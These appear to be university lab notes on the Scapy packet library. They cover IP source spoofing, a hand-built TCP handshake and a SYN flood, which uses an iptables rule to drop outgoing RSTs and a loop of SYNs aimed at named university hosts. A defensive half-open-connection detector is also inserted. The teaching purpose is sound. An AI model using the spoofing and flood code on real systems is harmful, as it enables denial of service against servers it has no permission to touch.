IT 4510

Scapy

Note to self: Make sure to allow firewall access from 1.1.1.1 on GAIA

Scapy

  • Sniff, send, dissect and forge network packets.
  • It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark.
  • sudo apt install python3-scapy
  • Must have root permissions on the machine you run it on.
  • sudo scapy launches the interactive interpreter.
  • Or create a Python file as usual and import the library (from scapy.all import *).
  • YOU MUST BE USING A VM FROM VM FARM

Scapy basics

  • ls() # lists the packet/layer types you can create
  • lsc() # lists the commands available for working with them

Example:

    i = IP()                    # empty IP layer with default fields
    i.show()                    # print the field values
    i.src = '1.1.1.1'           # spoofed source (see note about the GAIA firewall)
    i.dst = '144.38.193.245'
    i.show()
    send(i/'lastname')          # layer-3 send: IP header with a raw string payload

TCP

Recall the 3-way handshake:

  • syn ->
  • syn/ack <-
  • ack ->

TCP

Example:

  • TCP sent to port 80 with "syn" set. (This is the default for a new TCP() object in scapy: flags=S)
  • Response comes back (flags = SA)
    • sequence number might be 266183140
    • ack number might be 1
  • Ack sent back to server (flags = A)
    • sequence number is equal to the ack of the response (1)
    • ack number set to response sequence + 1 (266183141)

Example code

    #!/usr/bin/python3
    
    from scapy.all import *
    
    # Use a raw layer-3 socket so scapy builds the IP header itself
    conf.L3socket = L3RawSocket
    
    i = IP()
    i.dst = "computing.utahtech.edu"
    
    t = TCP()                 # flags default to S (SYN)
    t.dport = 80
    r = sr1(i/t)              # send the SYN, wait for the single SYN/ACK reply
    t.flags = "A"             # build the final ACK of the handshake
    t.seq = r.ack             # our seq is whatever the server acknowledged
    t.ack = r.seq + 1         # acknowledge the server's seq + 1
    p = i/t
    reply = sr(p)             # sr() returns (answered, unanswered) lists

Syn Flood

We must start with this:

    iptables -F; iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Otherwise the kernel sends RST packets to the target and the SYN flood fails. (Because scapy sends the packets, the OS has no record of the connection, so it tells the target to drop it.)

Syn Flood

If you start too many SYN requests to a server and never finish the handshake, you can crash the server.

Code to add:

    # t is the TCP() object from the example above; vary the source port per SYN
    for p in range(20000, 20010):
        t.sport = p
        send(i/t)
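As an added example (not part of these notes), here is the defender's-side counterpart: a small pure-Python tracker that applies the seq/ack rule from the handshake slide to constructed packet records and reports sources holding many half-open connections. The record layout and the 10.0.0.x client addresses are assumptions; it does not need Scapy to run.

```python
from collections import defaultdict

def track_handshakes(records):
    """Apply the seq/ack rule from the handshake notes to packet records.
    Each record is (src, sport, dst, dport, flags, seq, ack). Returns
    (completed_keys, half_open) keyed by (client, cport, server, sport)."""
    pending = {}        # SYN seen; value becomes the server seq once SA arrives
    completed = set()
    for src, sport, dst, dport, flags, seq, ack in records:
        if flags == "S":                       # client SYN opens a pending entry
            pending[(src, sport, dst, dport)] = None
        elif flags == "SA":                    # server reply flows server -> client
            key = (dst, dport, src, sport)
            if key in pending:
                pending[key] = seq
        elif flags == "A":                     # client ACK must carry server seq + 1
            key = (src, sport, dst, dport)
            srv_seq = pending.get(key)
            if srv_seq is not None and ack == srv_seq + 1:
                completed.add(key)
                del pending[key]
    return completed, pending

def syn_flood_suspects(records, threshold=5):
    """Client addresses holding more than `threshold` half-open connections."""
    _, half_open = track_handshakes(records)
    counts = defaultdict(int)
    for client, _cport, _server, _sport in half_open:
        counts[client] += 1
    return {c: n for c, n in counts.items() if n > threshold}

# Constructed sample: one completed handshake (server address and seq numbers
# from the notes) plus ten SYNs from a hypothetical 10.0.0.9 that never send
# the final ACK, mirroring the source-port loop above.
SERVER = "144.38.193.245"
SAMPLE = [
    ("10.0.0.5", 40000, SERVER, 80, "S", 1000, 0),
    (SERVER, 80, "10.0.0.5", 40000, "SA", 266183140, 1001),
    ("10.0.0.5", 40000, SERVER, 80, "A", 1001, 266183141),
]
for p in range(20000, 20010):
    SAMPLE.append(("10.0.0.9", p, SERVER, 80, "S", 0, 0))
    SAMPLE.append((SERVER, 80, "10.0.0.9", p, "SA", 5000 + p, 1))

if __name__ == "__main__":
    done, half = track_handshakes(SAMPLE)
    print(len(done), "completed,", len(half), "half-open, suspects:",
          syn_flood_suspects(SAMPLE))
```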

Slowloris

See definition

Remove the iptables rule from above (reset policies to ACCEPT and flush all chains):

    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -t nat -F
    iptables -t mangle -F
    iptables -F
    iptables -X